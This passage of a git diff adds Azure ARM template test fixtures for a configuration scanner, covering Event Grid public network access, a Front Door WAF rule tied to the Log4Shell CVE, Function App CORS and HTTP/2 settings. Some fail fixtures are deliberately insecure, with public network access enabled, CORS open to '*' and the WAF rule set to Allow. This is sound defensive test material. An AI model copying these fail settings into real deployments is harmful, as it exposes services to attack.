+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": "bool",
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string",
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json
new file mode 100644
index 00000000000..5d651bbb610
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventGrid/topics",
+      "apiVersion": "2023-12-15-preview",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "sku": {
+        "name": "string"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string",
+        "type": "string"
+      },
+      "identity": {
+        "principalId": "string",
+        "tenantId": "string",
+        "type": "string",
+        "userAssignedIdentities": {
+          "{customized property}": {
+            "clientId": "string",
+            "principalId": "string"
+          }
+        }
+      },
+      "properties": {
+        "dataResidencyBoundary": "string",
+        "disableLocalAuth": "bool",
+        "eventTypeInfo": {
+          "inlineEventTypes": {
+            "{customized property}": {
+              "dataSchemaUrl": "string",
+              "description": "string",
+              "displayName": "string",
+              "documentationUrl": "string"
+            }
+          },
+          "kind": "Inline"
+        },
+        "inboundIpRules": [
+          {
+            "action": "Allow",
+            "ipMask": "string"
+          }
+        ],
+        "inputSchema": "string",
+        "inputSchemaMapping": {
+          "inputSchemaMappingType": "string"
+        },
+        "minimumTlsVersionAllowed": "string",
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json
new file mode 100644
index 00000000000..273a09469de
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail1.json
@@ -0,0 +1,13 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "fail1",
+      "location": "[resourceGroup().location]",
+      "properties": {}
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json
new file mode 100644
index 00000000000..5e67ac71751
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail3.json
@@ -0,0 +1,33 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "fail3",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "Microsoft_DefaultRuleSet",
+              "ruleSetVersion": "1.1",
+              "ruleGroupOverrides": [
+                {
+                  "ruleGroupName": "JAVA",
+                  "rules": [
+                    {
+                      "action": "Block",
+                      "ruleId": "944240"
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json
new file mode 100644
index 00000000000..eb96a898ef6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/fail4.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "fail4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "Microsoft_DefaultRuleSet",
+              "ruleSetVersion": "1.1",
+              "ruleGroupOverrides": [
+                {
+                  "ruleGroupName": "JAVA",
+                  "rules": [
+                    {
+                      "action": "Allow",
+                      "ruleId": "944240",
+                      "enabledState": "Enabled"
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json
new file mode 100644
index 00000000000..3341bf6fbf7
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass1.json
@@ -0,0 +1,22 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "pass1",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "Microsoft_DefaultRuleSet",
+              "ruleSetVersion": "1.1"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json
new file mode 100644
index 00000000000..dd79be6936b
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass2.json
@@ -0,0 +1,22 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "DefaultRuleSet",
+              "ruleSetVersion": "1.0"
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json
new file mode 100644
index 00000000000..93096e7e8b6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass3.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "pass3",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "Microsoft_DefaultRuleSet",
+              "ruleSetVersion": "1.1",
+              "ruleGroupOverrides": [
+                {
+                  "ruleGroupName": "JAVA",
+                  "rules": [
+                    {
+                      "action": "Block",
+                      "ruleId": "944240",
+                      "enabledState": "Enabled"
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json
new file mode 100644
index 00000000000..6a924d4c600
--- /dev/null
+++ b/tests/arm/checks/resource/example_FrontDoorWAFACLCVE202144228/pass4.json
@@ -0,0 +1,34 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Network/frontdoorWebApplicationFirewallPolicies",
+      "apiVersion": "2019-09-01",
+      "name": "pass4",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "Microsoft_DefaultRuleSet",
+              "ruleSetVersion": "1.1",
+              "ruleGroupOverrides": [
+                {
+                  "ruleGroupName": "JAVA",
+                  "rules": [
+                    {
+                      "action": "Redirect",
+                      "ruleId": "944240",
+                      "enabledState": "Enabled"
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
new file mode 100644
index 00000000000..a1c52a80fe6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
@@ -0,0 +1,81 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "siteName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the Azure Web App."
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "The Azure region where the resource should be deployed."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Free",
+      "allowedValues": [
+        "Free",
+        "Shared",
+        "Basic",
+        "Standard",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of the Azure Web App."
+      }
+    },
+    "appServicePlanName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the App Service Plan to use."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2019-08-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "properties": {
+        "name": "[parameters('siteName')]",
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]",
+        "siteConfig": {
+          "appSettings": [
+            {
+              "name": "Setting1",
+              "value": "Value1"
+            },
+            {
+              "name": "Setting2",
+              "value": "Value2"
+            }
+          ],
+          "metadata": [
+            {
+              "name": "Key1",
+              "value": "Value1"
+            },
+            {
+              "name": "Key2",
+              "value": "Value2"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": ["*"]
+          }
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+      ],
+      "sku": {
+        "name": "[parameters('sku')]"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json
new file mode 100644
index 00000000000..d4db5386dc0
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass.json
@@ -0,0 +1,56 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "siteName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the Azure Web App."
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "The Azure region where the resource should be deployed."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Free",
+      "allowedValues": [
+        "Free",
+        "Shared",
+        "Basic",
+        "Standard",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of the Azure Web App."
+      }
+    },
+    "appServicePlanName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the App Service Plan to use."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2019-08-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "name": "[parameters('siteName')]",
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+      ],
+      "sku": {
+        "name": "[parameters('sku')]"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json
new file mode 100644
index 00000000000..89588498bbb
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/pass_with_cors.json
@@ -0,0 +1,81 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "siteName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the Azure Web App."
+      }
+    },
+    "location": {
+      "type": "string",
+      "metadata": {
+        "description": "The Azure region where the resource should be deployed."
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Free",
+      "allowedValues": [
+        "Free",
+        "Shared",
+        "Basic",
+        "Standard",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of the Azure Web App."
+      }
+    },
+    "appServicePlanName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the App Service Plan to use."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2019-08-01",
+      "name": "pass_with_cors",
+      "location": "[parameters('location')]",
+      "properties": {
+        "name": "[parameters('siteName')]",
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]",
+        "siteConfig": {
+          "appSettings": [
+            {
+              "name": "Setting1",
+              "value": "Value1"
+            },
+            {
+              "name": "Setting2",
+              "value": "Value2"
+            }
+          ],
+          "metadata": [
+            {
+              "name": "Key1",
+              "value": "Value1"
+            },
+            {
+              "name": "Key2",
+              "value": "Value2"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": ["192.0.0.1"]
+          }
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+      ],
+      "sku": {
+        "name": "[parameters('sku')]"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json
new file mode 100644
index 00000000000..fda341efc0e
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail.json
@@ -0,0 +1,374 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vaultName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key vault to be created."
+      }
+    },
+    "keyName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key to be created."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the resources"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "standard",
+      "allowedValues": [
+        "standard",
+        "premium"
+      ],
+      "metadata": {
+        "description": "The SKU of the vault to be created."
+      }
+    },
+    "keyType": {
+      "type": "string",
+      "defaultValue": "RSA",
+      "allowedValues": [
+        "EC",
+        "EC-HSM",
+        "RSA",
+        "RSA-HSM"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyType of the key to be created."
+      }
+    },
+    "keyOps": {
+      "type": "array",
+      "defaultValue": [],
+      "metadata": {
+        "description": "The permitted JSON web key operations of the key to be created."
+      }
+    },
+    "keySize": {
+      "type": "int",
+      "defaultValue": 2048,
+      "metadata": {
+        "description": "The size in bits of the key to be created."
+      }
+    },
+    "curveName": {
+      "type": "string",
+      "defaultValue": "",
+      "allowedValues": [
+        "",
+        "P-256",
+        "P-256K",
+        "P-384",
+        "P-521"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyCurveName of the key to be created."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": false,
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ],
+  "outputs": {
+    "proxyKey": {
+      "type": "object",
+      "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]"
+    }
+  }
+}
+
diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json
new file mode 100644
index 00000000000..64592e64706
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/fail2.json
@@ -0,0 +1,373 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vaultName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key vault to be created."
+      }
+    },
+    "keyName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key to be created."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the resources"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "standard",
+      "allowedValues": [
+        "standard",
+        "premium"
+      ],
+      "metadata": {
+        "description": "The SKU of the vault to be created."
+      }
+    },
+    "keyType": {
+      "type": "string",
+      "defaultValue": "RSA",
+      "allowedValues": [
+        "EC",
+        "EC-HSM",
+        "RSA-HSM"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyType of the key to be created."
+      }
+    },
+    "keyOps": {
+      "type": "array",
+      "defaultValue": [],
+      "metadata": {
+        "description": "The permitted JSON web key operations of the key to be created."
+      }
+    },
+    "keySize": {
+      "type": "int",
+      "defaultValue": 2048,
+      "metadata": {
+        "description": "The size in bits of the key to be created."
+      }
+    },
+    "curveName": {
+      "type": "string",
+      "defaultValue": "",
+      "allowedValues": [
+        "",
+        "P-256",
+        "P-256K",
+        "P-384",
+        "P-521"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyCurveName of the key to be created."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
